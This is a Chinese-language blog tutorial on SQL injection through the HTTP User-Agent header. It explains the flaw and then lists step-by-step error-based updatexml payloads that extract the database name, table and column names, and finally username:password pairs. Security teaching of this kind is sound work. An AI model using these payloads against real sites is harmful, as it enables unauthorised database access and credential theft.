什么是Http Header注入

有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证)
或者通过http header头信息获取客户端的一些信息,比如useragentaccept字段等等。
会对客户端的http header信息进行获取并使用SQL进行处理,如果此时没有足够的安全考虑
则可能会导致基于http headerSQL Inject漏洞。
QQ截图20190409180542.png

基于user-agent字段

验证

user-agent字段后输入'效果如下
验证.png

爆出数据库

User-Agent: 1'or updatexml(1,concat(0x7e,(database())),0) or'

数据库.png

爆出表

User-Agent: test001' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='lou' limit 0,1)),0) or'

表.png

爆出列

User-Agent:test001' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1)),0) or'

QQ截图20190409175930.png

爆出内容

User-Agent:test001' or updatexml(1,concat(0x7e,(select concat_ws(':', username, password) from users limit 0,1)),0) or'

QQ截图20190409180053.png

其他

sqlmap注入之(搜索型)注入

验证是否有注入我们直接输入一个字符k,点击搜索。提示未见异常我们输入关键字%k%效果如下:此时,我们可以得出,存在...

版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/968.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

最后修改:2023 年 08 月 04 日
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏